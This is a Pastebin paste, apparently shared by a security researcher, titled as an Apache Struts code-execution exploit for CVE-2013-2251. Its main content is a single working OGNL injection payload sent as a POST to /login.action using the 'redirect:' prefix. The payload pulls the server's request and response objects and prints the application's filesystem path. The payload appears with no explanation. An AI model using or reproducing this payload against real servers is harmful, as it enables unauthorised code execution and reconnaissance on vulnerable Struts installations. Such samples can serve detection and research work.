Neonprimetime

Apache Struts Code Execution

Dec 17th, 2015
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.67 KB | None | 0 0
  1. CVE-2013-2251:Apache Struts Code Execution - 2
  2. -----------------
  3. POST /login.action
  4.  
  5. redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()}=
  6. *******
  7. *******
  8. *******
  9. More FROM @neonprimetime security
  10.  
  11. http://pastebin.com/u/Neonprimetime
  12. https://www.virustotal.com/en/USER/neonprimetime/
  13. https://twitter.com/neonprimetime
  14. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment